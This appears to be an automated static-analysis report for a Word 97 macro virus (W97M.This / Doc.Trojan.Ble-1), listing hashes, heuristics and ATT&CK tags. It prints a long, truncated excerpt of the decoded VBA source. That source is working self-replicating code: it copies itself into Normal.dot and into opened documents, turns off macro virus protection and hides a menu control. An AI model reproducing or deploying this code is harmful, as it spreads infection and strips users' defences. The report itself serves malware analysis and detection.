W97M.This — Office (OLE) malware analysis

Static analysis result for SHA-256 204a4059a9f0a7d4…

MALICIOUS

Office (OLE)

43.0 KB Created: 1998-12-18 18:08:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: c927f597ba54225bbe59f3ff16d281f9 SHA-1: 38d47adbd504a746cfcfa832023133ed2d2d8e96 SHA-256: 204a4059a9f0a7d485e7653616a14e472cdaaf1dab2aa4f36efd0df8119ff144
180 Risk Score

Malware Insights

W97M.This · confidence 90%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros, including AutoOpen and Auto_Close, which are commonly used to execute malicious code upon document opening or closing. The script attempts to copy itself to the Normal.dot template, indicating a persistence mechanism. The ClamAV detection name 'Doc.Trojan.Ble-1' and the presence of AutoOpen/AutoClose macros strongly suggest a malicious document dropper.

Heuristics 5

  • ClamAV: Doc.Trojan.Ble-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ble-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 32719 bytes
SHA-256: 9771ef415d803570a1bba5f1659be45a7b5e9d444d1545cd5b5b6831084bb085
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "MacroBle"
Public myname$
Public Changed As Boolean
Public sz As Long
Public k As Long
Public NoSpecial As Boolean
Option Base 1
Dim ends$(2, 12)
Dim Moora1$(40)
Dim Moora2$(10)
Dim Bls$(3)



Sub AutoOpen()
Attribute AutoOpen.VB_Description = "10.04.97 (c) Microsoft Corporation"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Project.MacroBle.AutoOpen"
 On Error GoTo 1
 myname$ = "MacroBle"
 WordBasic.DisableAutoMacros 0
 
 If Not CheckNormal Then
  Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:=myname$, Object:=wdOrganizerObjectProjectItems
  Set mytemp = NormalTemplate.OpenAsDocument
  mytemp.SaveAs (GetPath$ + "NORMAL1.DOT")
  mytemp.Close SaveChanges:=wdSaveChanges
End If
GoTo 2
1:
 'MsgBox "Fuck up !"
 Resume 2
2:
 RunOtherMacro MacN:="AutoOpen"
End Sub
Function CheckNormal()
 cn = False
 For Each x In NormalTemplate.VBProject.VBComponents
  If x.Name = myname$ Then cn = True
 Next
 CheckNormal = cn
End Function
Sub RunOtherMacro(MacN As String)
 On Error GoTo Run_Error
 For Each Mac In ActiveDocument.VBProject.VBComponents
   If (Mac.Type = 1) And (Mac.Name <> "MacroBle") Then
    Application.Run "project." + Mac.Name + "." + MacN
Skip_Error:
   End If
  Next Mac
 GoTo End_Run
Run_Error:
 Resume Skip_Error
End_Run:

End Sub

Function CheckActive()
 cn = False
 For Each x In ActiveDocument.VBProject.VBComponents
  If x.Name = myname$ Then cn = True
 Next
 CheckActive = cn
 End Function

Sub AutoClose()
Attribute AutoClose.VB_Description = "10.04.97 (c) Microsoft Corporation"
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Project.MacroBle.AutoClose"
 On Error GoTo errorlevel2
 If Not CheckActive Then Application.OrganizerCopy Source:=GetPath$ + "NORMAL1.DOT", Destination:=ActiveDocument.FullName, Name:=myname$, Object:=wdOrganizerObjectProjectItems
 If MyDate Then Optimize
 GoTo end_f
errorlevel2:
 'MsgBox "More Errors !"
 Resume end_f
end_f:
 RunOtherMacro MacN:="AutoClose"
End Sub

Function GetPath$()
 s$ = NormalTemplate.FullName
 s$ = Mid$(s$, 1, Len(s$) - 10)
 GetPath$ = s$
End Function

Sub AutoExec()
Attribute AutoExec.VB_Description = "10.04.97 (c) Microsoft Corporation"
Attribute AutoExec.VB_ProcData.VB_Invoke_Func = "Project.MacroBle.AutoExec"
 Options.VirusProtection = False
 Set x = CommandBars("Tools").Controls(12)
 x.Visible = False
 x.Enabled = False
 ends$(1, 1) = "ûé"
 ends$(1, 2) = "îãî"
 ends$(1, 3) = "îìó"
 ends$(1, 4) = "ûì"
 ends$(1, 5) = "îì"
 ends$(1, 6) = "àÿ"
 ends$(1, 7) = "îé"
 ends$(1, 8) = "óþ"
 ends$(1, 9) = "ûå"
 ends$(1, 10) = "ûõ"
 ends$(1, 11) = "ûìè"
 ends$(1, 12) = "îå"
 ends$(2, 1) = "èé"
 ends$(2, 2) = "åãî"
 ends$(2, 3) = "åìó"
 ends$(2, 4) = "èì"
 ends$(2, 5) = "åì"
 ends$(2, 6) = "åé"
 ends$(2, 7) = "èå"
 ends$(2, 8) = "èõ"
 ends$(2, 9) = "èì"
 ends$(2, 10) = "èìè"
 ends$(2, 11) = "åå"
 ends$(2, 12) = "àÿ"
 
 Moora1$(1) = "õóåâ"
 Moora1$(2) = "åáàíóò"
 Moora1$(3) = "ãîíèì"
 Moora1$(4) = "äåáèëüí"
 Moora1$(5) = "ìóäà÷í"
 Moora1$(6) = "õðåíîâ"
 Moora1$(7) = "äóáîâ"
 Moora1$(8) = "ñîïëèâ"
 Moora1$(9) = "êîðÿâ"
 Moora1$(10) = "óáëþäî÷í"
 
 Moora1$(11) = "ïåäðèëüí"
 Moora1$(12) = "ãîâíÿí"
 Moora1$(13) = "êîçëèí"
 Moora1$(14) = "åáëèâ"
 Moora1$(15) = "åáàí"
 Moora1$(16) = "ïèçäàíóò"
 Moora1$(17) = "ïðèäóðîøí"
 Moora1$(18) = "øèçàíóò"
 Moora1$(19) = "ãíóñí"
 Moora1$(20) = "ñòðåìí"
 
 Moora1$(21) = "ãíóñàâ"
 Moora1$(22) = "òóïîðûë"
 Moora1$(23) = "êàíàëèçàöèîíí"
 Moora1$(24) = "âèçãëèâ"
 Moora1$(25) = "ñëåïîøàð"
 Moora1$(26) = "ïðûùàâ"
 Moora1$(27) = "ðâîòí"
 Moora1$(28) = "ñêëî÷í"
 Moora1$(29) = "óðîäëèâ"
 Moora1$(30) = "áîðîäàâî÷í"
 
 Moora1$(31) = "îáñòðóõàíí"
 Moora1$(32) = "íåíîðìàëüí"
 Moora1$(33) = "ïëþãàâ
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.